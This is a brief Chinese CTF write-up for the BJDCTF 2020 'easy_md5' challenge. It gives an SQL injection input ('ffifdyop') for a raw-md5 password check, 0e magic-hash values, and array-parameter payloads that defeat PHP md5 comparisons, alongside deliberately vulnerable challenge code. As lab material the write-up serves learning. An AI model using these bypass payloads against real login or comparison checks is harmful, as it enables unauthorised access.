AceNyaRu

BJDCTF 2020

  • 647 字

easy_md5

扫一下看响应
hint: select * from 'admin' where password=md5($pass,true) //TRUE - 原始 16 字符二进制格式
通过输入框传入password,需要一个md5后开头是or的字符串,看下wp,ffifdyop

1
2
3
4
5
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    header('Location: levell14.php');

采用0e绕过 ?a=QNKCDZO&b=240610708
也可以数组绕过

1
2
3
4
5
6
7
8
9
 <?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

采用数组绕过 param1[]=1&param2[]=2 以post

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可